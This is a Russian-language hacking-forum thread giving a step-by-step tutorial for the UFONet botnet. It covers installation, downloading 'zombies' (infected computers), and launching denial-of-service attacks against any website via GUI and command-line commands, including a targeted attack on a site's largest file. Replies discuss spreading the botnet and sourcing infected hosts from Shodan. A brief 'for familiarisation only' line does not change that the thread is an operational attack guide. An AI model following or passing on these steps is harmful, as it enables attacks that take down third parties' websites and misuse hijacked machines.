Загрузка...

BOTNet, что это и с чем его едят.

Тема в разделе Веб уязвимости создана пользователем Vercello 19 мар 2020. 3412 просмотров

Загрузка...
Опрос

Делать похожий контент?

Результаты будут видны только после голосования.

  1. Да

  2. Нет

  3. Свой вариант

Сортировать
  1. Vercello
    Кому понравилось (11) Скопировать BBCode
    Vercello Автор темы 19 мар 2020 525 20 июн 2017
    ps это перезалив старой темы, которую удалили по причине безполезная тема :/ если и эту удалят по этой же причине, то врятли образовательные статьи интересны на форуме, я так считаю.
    --------------------------------------------------------------------------------------------

    Привет! Недавно, я нашел на гитхабе один интересный репозиторий, но он был довольно сложен в освоений.
    И так, сегодня вы прочитаете статью о том, что такое ботнет, и как мы его будем использовать!
    [IMG]
    ----------------------------------------------------------------------------------------------------------------------------------------
    Вот что вам понадобится:
    1) Kali Linux или же установленный терминал линукса на десятую винду (как у меня)
    2) Установка Python 3,7 на Линукс
    И так, после того как вы установили линукс , в терминале прописываем данные команды:
    Код
    apt-get update
    
apt-get upgrade
    
sudo apt-get install python3
    
sudo apt install python3-pip
    
sudo apt-get install git
    Эти команды установят питон, сделают апдейт всех пакетов и файлов, и установят две нужные нам команды. (pip и git clone)
    3)Очень много терпения, возможно будут трудности.
    -----------------------------------------------------------------------------------------------
    Хорошо, мы подготовлены к началу использования ботнета.
    Заходим в терминал, пишем:
    Код
    sudo git clone https://github.com/epsylon/ufonet.git
    [IMG]
    Ждем окончания загрузки.
    После того, как все установилось, прописываем команду:
    Код
    ls
    [IMG]
    ВНИМАНИЕ! У вас не будет *UfonetDeath*. Это мой репозиторий, не обращайте внимания.
    И так, видите у себя/на скрине синим цветом *ufonet*? это то, что вы установили командой git clone.
    Заходим в папку с этим репозиторием. Команда:
    Код
    cd ufonet
    [IMG]
    Если вы все сделали правильно, то у вас будет отображаться что вы находитесь в папке с ботнетом.*
    Так, прописываем команду:
    Код
    ls
    И видим, что у нас в этой папке много чего.
    [IMG]
    На скрине видим, что тут много файлов. Но они работать не будут.
    Потому что мы не установили другие пакеты и файлы для работы. Устанавливаем их!
    Пишем эту длинную команду:
    Код
    sudo apt-get install python3-pycurl python3-geoip python3-whois python3-crypto python3-requests python3-scapy
    Жмём enter;
    [IMG]
    Когда прописали, у вас начнется загрузка.
    После окончания загрузки, вы установили все нужные файлы.
    И так, на скрине4 мы видели файлы, сейчас запускаем наш ботнет!
    Пишем:
    Код
    python3 ufonet
    [IMG]
    На скрине видем, что у вас открывается большая менюшка.
    Теперь, начинаем работу.
    --------------------------------------------------------------------------------
    Для начала, нам нужно найти сами ботнеты. (По сути компьютеры, с которых будем атаковать)
    Ищутся они вот такой командой:
    Код
    sudo python3 ufonet --download-zombies
    [IMG]
    У нас запрашивают:
    Do you want to merge ONLY the new 'troops' into your army? (Y/n)**
    Подтверждаем, пишем     y
    Еще у нас спрашивают:
    You would also like to update other content: News, Grid, Board...(Y/n)***
    Пишем y
    Так, вы скачали готовые зомби(зараженные компы) с серверов самой программы. НО! Так же, вы можете самому искать свежих зомби. Об этом, если хотите, могу дописать в теме.
    Хорошо, у нас есть зомби, теперь приступаем к самой атаке..
    ------------------------------------------
    СПОСОБ 1 (Простой)
    Пишем в терминале команду:
    Код
    sudo python3 ufonet --gui

    [IMG]
    Отлично, у нас теперь есть онлайн-панель! Переходим по ссылке:
    http://127.0.0.1:9999
    Видим данную картину:
    [IMG]
    Нажимаем на кнопку *START MOTHERSHIP!*
    Далее, видим такую меню:
    [IMG]
    Итак, за что какая вкладка отвечает:
    1) Botnet
    Ботнет, в этой вкладке мы ищем зомби для нашей атаки.
    [IMG]
    Данная вкладка вам не нужна на данный момент , потому что мы уже их скачали с сервера.

    2)Inspect
    [IMG]

    Данная вкладка ищет самый большой файл( видео, картинку итд) чтобы потом через специальную атаку (о которой по вашему желанию я могу дописать в теме) положить сайт с большей эффективностью.
    Пока что нам не нужно.
    3)Attack
    [IMG]
    Ну тут все понятно, тут будет происходить шарманка)
    4)Help
    [IMG]

    Тут тоже все понятно, ответы на вопросы :)
    ---------------------
    Так, посмотрите на скрин внизу!
    [IMG]
    Нажимаем на конфиг, единственное что вам может понадобится, это ****** сервер. Не забудьте после настройки, внизу открывшегося окошка нажать Set!
    [IMG]
    Все, теперь, если вы нажмете на кнопку *attack* начнется атака!
    В принципе, на этом можно закончить.
    Но, если вы не уверены в том что атака началась, читаем гайд ниже!
    заходим в консоль (делаем новую вкладку)
    Снова заходим в папку с ботнетом (команда:
    cd ufonet )
    Пишем данную команду:
    Код
    sudo python3 ufonet -a ссылканасайт -r 10
    Там, где после -r число *10* - это кол-во циклов
    [IMG]
    Внимание! Если у вас эта менюшка висит долго, ВСЕ НОРМАЛЬНО!
    Она проверяет включен ли сайт.[IMG]
    После загрузки, вы увидите в терминале это:
    [IMG]
    Это значит, что все идет по маслу!
    Спасибо за прочтение статьи, надеюсь вы поймете что это все лишь для ознакомления с процессом!
    Так как тема вам зашла, вот второй способ атаки!
    Итак, пишем в терминал:
    [CODE]cd ufonet
    ls
    sudo python3 ufonet -i https://вашсайт.com
    [/CODE]Эта команда ищет на сайте самый большой файл, чтобы в дальнейшем использовать его!
    [IMG]
    И так, после окончания поиска он находил самый большой файл на сервере:
    [IMG]
    Отлично, теперь у нас есть эффективный метод стресс-атаки.
    Теперь, нам нужно начать эту атаку!
    Открываем консоль (так как вы уже в папке с ufonet то пишем это)
    [CODE]sudo python3 ufonet -a http://вайшсайт -b "/files/самый большой файл"[/CODE]!ВНИМАНИЕ! Самый большой файл не обязательно будет такой который я написал выше, смотрите на файл который вам написала программа!!
    Писать путь файла нужно примерно так:
    http://yoursite.com/вот это путь файла, пишите его
    Пример:
    [IMG]
    пишем то что после instagram.com (соответсвенно, ваш сайт и путь (путь пишем вместе с слэшем !!)
    Вот и все, это специальная атака, которая бьет по самому слабому месту.
    p.s
    **=обновляет бд зомби
    *** обновляет веб-интерфейс
    Если у вас будут вопросы, пожалуйста напишите мне в телеграм
    (RaysMorgan я конечно ни на что не намекаю но по моему это статья достойна авторки :da:)
    @taymik
     
    19 мар 2020
  2. Kanade
    Кому понравилось (1) Скопировать BBCode
    Kanade 24 мар 2020
    Годно
     
    24 мар 2020
  3. zer0day
    Скопировать BBCode
    zer0day 25 апр 2020 :kitwtf: легко обходим блокировки -> lolz.live/threads/5863759
    Годно конечно, но вот как его распространять :hmm:
     
    25 апр 2020
    1. Vercello Автор темы
      zer0day, если хочешь получить зараженные компы, проведи поиск, можно брать бд из шодана
      25 мар 2020
    2. zer0day
      Vercello, у шодана вроде платный доступ
      25 мар 2020
    3. Vercello Автор темы
      zer0day, если ты читал статью, там есть пункт о том как находить зараженные компы
      25 мар 2020
  4. vanykowih
    Кому понравилось (1) Скопировать BBCode
    vanykowih 7 июл 2020 41 23 мар 2018
    РПГ в открытом мире
     
    7 июл 2020
Top